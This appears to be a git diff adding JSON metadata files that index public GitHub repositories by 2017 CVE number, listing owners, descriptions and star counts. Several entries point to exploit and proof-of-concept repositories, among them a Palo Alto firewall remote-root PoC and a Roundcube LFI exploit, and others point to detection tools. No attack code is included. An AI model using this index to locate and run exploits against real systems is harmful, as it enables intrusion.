+[ + { + "id": 165762179, + "name": "ImageMagick-CVE-2017-15277", + "full_name": "hexrom\/ImageMagick-CVE-2017-15277", + "owner": { + "login": "hexrom", + "id": 21228150, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/21228150?v=4", + "html_url": "https:\/\/github.com\/hexrom", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hexrom\/ImageMagick-CVE-2017-15277", + "description": "PoC files for CVE-2017-15277, use with neex\/gifoeb", + "fork": false, + "created_at": "2019-01-15T01:20:44Z", + "updated_at": "2023-07-12T22:09:40Z", + "pushed_at": "2020-09-02T00:53:02Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2017-15277", + "imagemagick", + "memory-leak" + ], + "visibility": "public", + "forks": 1, + "watchers": 5, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-15303.json b/2017/CVE-2017-15303.json new file mode 100644 index 0000000000..fe46096398 --- /dev/null +++ b/2017/CVE-2017-15303.json @@ -0,0 +1,38 @@ +[ + { + "id": 122435032, + "name": "Stryker", + "full_name": "hfiref0x\/Stryker", + "owner": { + "login": "hfiref0x", + "id": 10708977, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/10708977?v=4", + "html_url": "https:\/\/github.com\/hfiref0x", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hfiref0x\/Stryker", + "description": "Multi-purpose proof-of-concept tool based on CPU-Z CVE-2017-15303", + "fork": false, + "created_at": "2018-02-22T05:31:13Z", + "updated_at": "2024-10-15T02:57:14Z", + "pushed_at": "2018-02-25T08:49:07Z", + "stargazers_count": 107, + "watchers_count": 107, + "has_discussions": false, + "forks_count": 61, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "c", + "cve-2017-15303", + "dse", + "loader" + ], + "visibility": "public", + "forks": 61, + "watchers": 107, + "score": 0, + "subscribers_count": 11 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-15361.json b/2017/CVE-2017-15361.json new file mode 100644 index 0000000000..d1a4ddeab1 --- /dev/null +++ b/2017/CVE-2017-15361.json @@ -0,0 +1,200 @@ +[ + { + "id": 107277248, + "name": "Infineon-CVE-2017-15361", + "full_name": "lva\/Infineon-CVE-2017-15361", + "owner": { + "login": "lva", + "id": 1962037, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1962037?v=4", + "html_url": "https:\/\/github.com\/lva", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/lva\/Infineon-CVE-2017-15361", + "description": "Simple PowerShell script to check whether a computer is using an Infineon TPM chip that is vulnerable to CVE-2017-15361.", + "fork": false, + "created_at": "2017-10-17T14:07:45Z", + "updated_at": "2017-10-23T02:23:23Z", + "pushed_at": "2017-10-19T11:24:22Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 107299810, + "name": "rocacheck", + "full_name": "titanous\/rocacheck", + "owner": { + "login": "titanous", + "id": 13026, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/13026?v=4", + "html_url": "https:\/\/github.com\/titanous", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/titanous\/rocacheck", + "description": "Go package that checks if RSA keys are vulnerable to ROCA \/ CVE-2017-15361", + "fork": false, + "created_at": "2017-10-17T17:08:22Z", + "updated_at": "2024-09-19T13:32:40Z", + "pushed_at": "2017-10-23T19:39:21Z", + "stargazers_count": 15, + "watchers_count": 15, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 6, + "watchers": 15, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 107592667, + "name": "Detect-CVE-2017-15361-TPM", + "full_name": "nsacyber\/Detect-CVE-2017-15361-TPM", + "owner": { + "login": "nsacyber", + "id": 6088344, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6088344?v=4", + "html_url": "https:\/\/github.com\/nsacyber", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nsacyber\/Detect-CVE-2017-15361-TPM", + "description": "Detects Windows and Linux systems with enabled Trusted Platform Modules (TPM) vulnerable to CVE-2017-15361. #nsacyber", + "fork": false, + "created_at": "2017-10-19T20:02:56Z", + "updated_at": "2024-10-18T19:21:24Z", + "pushed_at": "2018-09-04T21:35:36Z", + "stargazers_count": 55, + "watchers_count": 55, + "has_discussions": false, + "forks_count": 28, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "audit", + "cve", + "nessus", + "rsa", + "tpm", + "trusted-platform-module", + "vulnerability" + ], + "visibility": "public", + "forks": 28, + "watchers": 55, + "score": 0, + "subscribers_count": 15 + }, + { + "id": 108202276, + "name": "zeek-plugin-roca", + "full_name": "0xxon\/zeek-plugin-roca", + "owner": { + "login": "0xxon", + "id": 1538460, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1538460?v=4", + "html_url": "https:\/\/github.com\/0xxon", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xxon\/zeek-plugin-roca", + "description": "Bro plugin to check if certificates are affected by CVE-2017-15361", + "fork": false, + "created_at": "2017-10-25T01:10:06Z", + "updated_at": "2019-05-24T11:29:34Z", + "pushed_at": "2018-11-14T19:00:42Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 3, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 108287639, + "name": "roca", + "full_name": "0xxon\/roca", + "owner": { + "login": "0xxon", + "id": 1538460, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1538460?v=4", + "html_url": "https:\/\/github.com\/0xxon", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xxon\/roca", + "description": "Reimplementation of CVE-2017-15361 checker in C", + "fork": false, + "created_at": "2017-10-25T15:16:11Z", + "updated_at": "2017-10-25T15:16:43Z", + "pushed_at": "2017-10-25T15:16:42Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 309390412, + "name": "ROCA-attack-on-vulnerability-CVE-2017-15361", + "full_name": "Elbarbons\/ROCA-attack-on-vulnerability-CVE-2017-15361", + "owner": { + "login": "Elbarbons", + "id": 73446737, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/73446737?v=4", + "html_url": "https:\/\/github.com\/Elbarbons", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Elbarbons\/ROCA-attack-on-vulnerability-CVE-2017-15361", + "description": "ROCA attack on vulnerability CVE-2017-15361", + "fork": false, + "created_at": "2020-11-02T14:12:37Z", + "updated_at": "2024-01-18T09:48:15Z", + "pushed_at": "2023-10-11T08:23:51Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "python", + "rsa-cryptography", + "vulnerability-detection" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-15394.json b/2017/CVE-2017-15394.json new file mode 100644 index 0000000000..95cab60e98 --- /dev/null +++ b/2017/CVE-2017-15394.json @@ -0,0 +1,33 @@ +[ + { + "id": 112094225, + "name": "CVE-2017-15394", + "full_name": "sudosammy\/CVE-2017-15394", + "owner": { + "login": "sudosammy", + "id": 18524051, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18524051?v=4", + "html_url": "https:\/\/github.com\/sudosammy", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sudosammy\/CVE-2017-15394", + "description": null, + "fork": false, + "created_at": "2017-11-26T15:32:04Z", + "updated_at": "2017-11-26T15:32:04Z", + "pushed_at": "2017-11-26T15:32:56Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-15428.json b/2017/CVE-2017-15428.json new file mode 100644 index 0000000000..2ca9ceb1e3 --- /dev/null +++ b/2017/CVE-2017-15428.json @@ -0,0 +1,33 @@ +[ + { + "id": 769963067, + "name": "CVE-2017-15428", + "full_name": "w1ldb1t\/CVE-2017-15428", + "owner": { + "login": "w1ldb1t", + "id": 119981311, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/119981311?v=4", + "html_url": "https:\/\/github.com\/w1ldb1t", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/w1ldb1t\/CVE-2017-15428", + "description": "An exploit for CVE-2017-15428.", + "fork": false, + "created_at": "2024-03-10T14:53:53Z", + "updated_at": "2024-03-11T19:37:43Z", + "pushed_at": "2024-03-17T18:58:25Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-15708.json b/2017/CVE-2017-15708.json new file mode 100644 index 0000000000..1c919fa17b --- /dev/null +++ b/2017/CVE-2017-15708.json @@ -0,0 +1,33 @@ +[ + { + "id": 114627582, + "name": "CVE-2017-15708", + "full_name": "HuSoul\/CVE-2017-15708", + "owner": { + "login": "HuSoul", + "id": 17831277, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/17831277?v=4", + "html_url": "https:\/\/github.com\/HuSoul", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/HuSoul\/CVE-2017-15708", + "description": "Apache synapse 反序列化 CVE–2017–15708", + "fork": false, + "created_at": "2017-12-18T10:27:58Z", + "updated_at": "2020-09-24T10:42:20Z", + "pushed_at": "2017-12-18T07:16:14Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 8, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 8, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-15715.json b/2017/CVE-2017-15715.json new file mode 100644 index 0000000000..678de155a3 --- /dev/null +++ b/2017/CVE-2017-15715.json @@ -0,0 +1,33 @@ +[ + { + "id": 193028306, + "name": "CVE-2017-15715", + "full_name": "whisp1830\/CVE-2017-15715", + "owner": { + "login": "whisp1830", + "id": 24414594, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/24414594?v=4", + "html_url": "https:\/\/github.com\/whisp1830", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/whisp1830\/CVE-2017-15715", + "description": null, + "fork": false, + "created_at": "2019-06-21T04:05:32Z", + "updated_at": "2019-06-21T04:06:25Z", + "pushed_at": "2019-06-21T04:06:24Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-15944.json b/2017/CVE-2017-15944.json new file mode 100644 index 0000000000..d075948956 --- /dev/null +++ b/2017/CVE-2017-15944.json @@ -0,0 +1,126 @@ +[ + { + "id": 114719978, + "name": "CVE-2017-15944-POC", + "full_name": "xxnbyy\/CVE-2017-15944-POC", + "owner": { + "login": "xxnbyy", + "id": 20261647, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20261647?v=4", + "html_url": "https:\/\/github.com\/xxnbyy", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/xxnbyy\/CVE-2017-15944-POC", + "description": "CVE-2017-15944 Palo Alto Networks firewalls remote root code execution POC", + "fork": false, + "created_at": "2017-12-19T04:43:24Z", + "updated_at": "2023-11-18T03:10:26Z", + "pushed_at": "2017-12-15T02:57:41Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 6, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 134778333, + "name": "PaloAltoRceDetectionAndExploit", + "full_name": "surajraghuvanshi\/PaloAltoRceDetectionAndExploit", + "owner": { + "login": "surajraghuvanshi", + "id": 7037657, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7037657?v=4", + "html_url": "https:\/\/github.com\/surajraghuvanshi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/surajraghuvanshi\/PaloAltoRceDetectionAndExploit", + "description": "Detecion for the vulnerability CVE-2017-15944", + "fork": false, + "created_at": "2018-05-24T23:19:57Z", + "updated_at": "2023-09-01T01:59:04Z", + "pushed_at": "2019-04-04T03:00:44Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 6, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 267752481, + "name": "CVE-2017-15944", + "full_name": "yukar1z0e\/CVE-2017-15944", + "owner": { + "login": "yukar1z0e", + "id": 44317939, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/44317939?v=4", + "html_url": "https:\/\/github.com\/yukar1z0e", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/yukar1z0e\/CVE-2017-15944", + "description": null, + "fork": false, + "created_at": "2020-05-29T03:04:18Z", + "updated_at": "2020-05-29T06:53:49Z", + "pushed_at": "2020-05-29T06:53:47Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 601979643, + "name": "PaloAlto_EXP", + "full_name": "3yujw7njai\/PaloAlto_EXP", + "owner": { + "login": "3yujw7njai", + "id": 7390055, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7390055?v=4", + "html_url": "https:\/\/github.com\/3yujw7njai", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/3yujw7njai\/PaloAlto_EXP", + "description": "PaloAlto EXP(CVE-2017-15944)", + "fork": false, + "created_at": "2023-02-15T08:38:02Z", + "updated_at": "2023-02-15T08:38:02Z", + "pushed_at": "2023-02-16T05:39:12Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-15950.json b/2017/CVE-2017-15950.json new file mode 100644 index 0000000000..ef08c94a2f --- /dev/null +++ b/2017/CVE-2017-15950.json @@ -0,0 +1,33 @@ +[ + { + "id": 372596023, + "name": "CVE-2017-15950", + "full_name": "rnnsz\/CVE-2017-15950", + "owner": { + "login": "rnnsz", + "id": 84464863, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/84464863?v=4", + "html_url": "https:\/\/github.com\/rnnsz", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/rnnsz\/CVE-2017-15950", + "description": null, + "fork": false, + "created_at": "2021-05-31T18:26:19Z", + "updated_at": "2021-05-31T19:00:21Z", + "pushed_at": "2021-05-31T19:00:19Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-16082.json b/2017/CVE-2017-16082.json new file mode 100644 index 0000000000..c7cbbaf944 --- /dev/null +++ b/2017/CVE-2017-16082.json @@ -0,0 +1,33 @@ +[ + { + "id": 159378663, + "name": "CVE-2017-16082", + "full_name": "nulldreams\/CVE-2017-16082", + "owner": { + "login": "nulldreams", + "id": 13773645, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/13773645?v=4", + "html_url": "https:\/\/github.com\/nulldreams", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nulldreams\/CVE-2017-16082", + "description": "NodeJS + Postgres (Remote Code Execution) 🛰", + "fork": false, + "created_at": "2018-11-27T18:09:17Z", + "updated_at": "2020-11-06T15:37:24Z", + "pushed_at": "2018-11-27T18:42:48Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 5, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-16088.json b/2017/CVE-2017-16088.json new file mode 100644 index 0000000000..405776fcac --- /dev/null +++ b/2017/CVE-2017-16088.json @@ -0,0 +1,33 @@ +[ + { + "id": 203029257, + "name": "CVE-2017-16088", + "full_name": "Flyy-yu\/CVE-2017-16088", + "owner": { + "login": "Flyy-yu", + "id": 25512004, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25512004?v=4", + "html_url": "https:\/\/github.com\/Flyy-yu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Flyy-yu\/CVE-2017-16088", + "description": "Exploit CVE-2017-16088 ", + "fork": false, + "created_at": "2019-08-18T16:22:46Z", + "updated_at": "2019-08-18T16:23:18Z", + "pushed_at": "2019-08-18T16:23:16Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-16245.json b/2017/CVE-2017-16245.json new file mode 100644 index 0000000000..d0e82a268b --- /dev/null +++ b/2017/CVE-2017-16245.json @@ -0,0 +1,33 @@ +[ + { + "id": 153248100, + "name": "CVE-2017-16245", + "full_name": "AOCorsaire\/CVE-2017-16245", + "owner": { + "login": "AOCorsaire", + "id": 17743663, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/17743663?v=4", + "html_url": "https:\/\/github.com\/AOCorsaire", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/AOCorsaire\/CVE-2017-16245", + "description": "Source code for CVE-2017-16245 (Avecto Defendpoint bypass originally disclosed by Nettitude) ", + "fork": false, + "created_at": "2018-10-16T08:14:29Z", + "updated_at": "2019-11-13T09:28:06Z", + "pushed_at": "2018-10-16T14:30:41Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 4 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-1635.json b/2017/CVE-2017-1635.json new file mode 100644 index 0000000000..2061f114ae --- /dev/null +++ b/2017/CVE-2017-1635.json @@ -0,0 +1,64 @@ +[ + { + "id": 120433534, + "name": "tivoli-poc", + "full_name": "emcalv\/tivoli-poc", + "owner": { + "login": "emcalv", + "id": 36189787, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/36189787?v=4", + "html_url": "https:\/\/github.com\/emcalv", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/emcalv\/tivoli-poc", + "description": "CVE-2017-1635 PoC code", + "fork": false, + "created_at": "2018-02-06T09:43:28Z", + "updated_at": "2019-05-15T02:02:47Z", + "pushed_at": "2018-02-06T12:14:06Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 344592351, + "name": "cve-2017-1635-PoC", + "full_name": "bcdannyboy\/cve-2017-1635-PoC", + "owner": { + "login": "bcdannyboy", + "id": 12553297, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/12553297?v=4", + "html_url": "https:\/\/github.com\/bcdannyboy", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bcdannyboy\/cve-2017-1635-PoC", + "description": "poc based on: https:\/\/github.com\/emcalv\/tivoli-poc", + "fork": false, + "created_at": "2021-03-04T19:52:48Z", + "updated_at": "2024-06-05T13:33:40Z", + "pushed_at": "2021-03-04T19:54:05Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-16524.json b/2017/CVE-2017-16524.json new file mode 100644 index 0000000000..3c05095561 --- /dev/null +++ b/2017/CVE-2017-16524.json @@ -0,0 +1,33 @@ +[ + { + "id": 109582148, + "name": "CVE-2017-16524", + "full_name": "realistic-security\/CVE-2017-16524", + "owner": { + "login": "realistic-security", + "id": 33375077, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/33375077?v=4", + "html_url": "https:\/\/github.com\/realistic-security", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/realistic-security\/CVE-2017-16524", + "description": "Unrestricted file upload vulnerability - Web Viewer 1.0.0.193 on Samsung SRN-1670D", + "fork": false, + "created_at": "2017-11-05T13:32:43Z", + "updated_at": "2019-11-18T19:42:37Z", + "pushed_at": "2017-11-05T23:17:44Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 4, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-16541.json b/2017/CVE-2017-16541.json new file mode 100644 index 0000000000..580faa3d29 --- /dev/null +++ b/2017/CVE-2017-16541.json @@ -0,0 +1,33 @@ +[ + { + "id": 352593664, + "name": "A-breif-introduction-of-CVE-2017-16541", + "full_name": "Ethan-Chen-uwo\/A-breif-introduction-of-CVE-2017-16541", + "owner": { + "login": "Ethan-Chen-uwo", + "id": 71363177, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/71363177?v=4", + "html_url": "https:\/\/github.com\/Ethan-Chen-uwo", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Ethan-Chen-uwo\/A-breif-introduction-of-CVE-2017-16541", + "description": null, + "fork": false, + "created_at": "2021-03-29T09:52:11Z", + "updated_at": "2021-03-29T10:06:30Z", + "pushed_at": "2021-03-29T10:06:28Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-16567.json b/2017/CVE-2017-16567.json new file mode 100644 index 0000000000..b28d4a6df3 --- /dev/null +++ b/2017/CVE-2017-16567.json @@ -0,0 +1,33 @@ +[ + { + "id": 108069202, + "name": "CVE-2017-16567", + "full_name": "dewankpant\/CVE-2017-16567", + "owner": { + "login": "dewankpant", + "id": 8929631, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8929631?v=4", + "html_url": "https:\/\/github.com\/dewankpant", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dewankpant\/CVE-2017-16567", + "description": null, + "fork": false, + "created_at": "2017-10-24T02:54:08Z", + "updated_at": "2018-07-18T00:29:06Z", + "pushed_at": "2018-07-18T00:29:04Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-16568.json b/2017/CVE-2017-16568.json new file mode 100644 index 0000000000..fb4afc85ef --- /dev/null +++ b/2017/CVE-2017-16568.json @@ -0,0 +1,33 @@ +[ + { + "id": 118300598, + "name": "CVE-2017-16568", + "full_name": "dewankpant\/CVE-2017-16568", + "owner": { + "login": "dewankpant", + "id": 8929631, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8929631?v=4", + "html_url": "https:\/\/github.com\/dewankpant", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dewankpant\/CVE-2017-16568", + "description": null, + "fork": false, + "created_at": "2018-01-21T03:17:56Z", + "updated_at": "2018-07-18T00:27:02Z", + "pushed_at": "2018-07-18T00:27:01Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-16651.json b/2017/CVE-2017-16651.json new file mode 100644 index 0000000000..0c3300be76 --- /dev/null +++ b/2017/CVE-2017-16651.json @@ -0,0 +1,64 @@ +[ + { + "id": 327169091, + "name": "CVE-2017-16651", + "full_name": "ropbear\/CVE-2017-16651", + "owner": { + "login": "ropbear", + "id": 11134586, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/11134586?v=4", + "html_url": "https:\/\/github.com\/ropbear", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ropbear\/CVE-2017-16651", + "description": "Python implementation of Roundcube LFI (CVE-2017-16651)", + "fork": false, + "created_at": "2021-01-06T01:46:39Z", + "updated_at": "2023-09-24T16:23:48Z", + "pushed_at": "2021-01-06T01:47:39Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 768258204, + "name": "CVE-2017-16651-Exploit", + "full_name": "sephiroth950911\/CVE-2017-16651-Exploit", + "owner": { + "login": "sephiroth950911", + "id": 61886874, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61886874?v=4", + "html_url": "https:\/\/github.com\/sephiroth950911", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sephiroth950911\/CVE-2017-16651-Exploit", + "description": "Exploit para la vulnerabilidad CVE-2017-16651 en Roundcube Webmail con un toque cyberpunk.", + "fork": false, + "created_at": "2024-03-06T18:53:06Z", + "updated_at": "2024-03-11T03:04:55Z", + "pushed_at": "2024-03-11T03:06:11Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-16720.json b/2017/CVE-2017-16720.json new file mode 100644 index 0000000000..1f744ad576 --- /dev/null +++ b/2017/CVE-2017-16720.json @@ -0,0 +1,33 @@ +[ + { + "id": 702913791, + "name": "WebAccess-CVE-2017-16720-", + "full_name": "CN016\/WebAccess-CVE-2017-16720-", + "owner": { + "login": "CN016", + "id": 108575004, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/108575004?v=4", + "html_url": "https:\/\/github.com\/CN016", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/CN016\/WebAccess-CVE-2017-16720-", + "description": "WebAccess远程命令执行漏洞(CVE-2017-16720)复现", + "fork": false, + "created_at": "2023-10-10T08:47:34Z", + "updated_at": "2024-01-19T16:20:35Z", + "pushed_at": "2023-10-10T08:48:16Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-16744.json b/2017/CVE-2017-16744.json new file mode 100644 index 0000000000..19af8e26d3 --- /dev/null +++ b/2017/CVE-2017-16744.json @@ -0,0 +1,33 @@ +[ + { + "id": 207384844, + "name": "CVE-2017-16744-and-CVE-2017-16748-Tridium-Niagara", + "full_name": "GainSec\/CVE-2017-16744-and-CVE-2017-16748-Tridium-Niagara", + "owner": { + "login": "GainSec", + "id": 46727209, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/46727209?v=4", + "html_url": "https:\/\/github.com\/GainSec", + 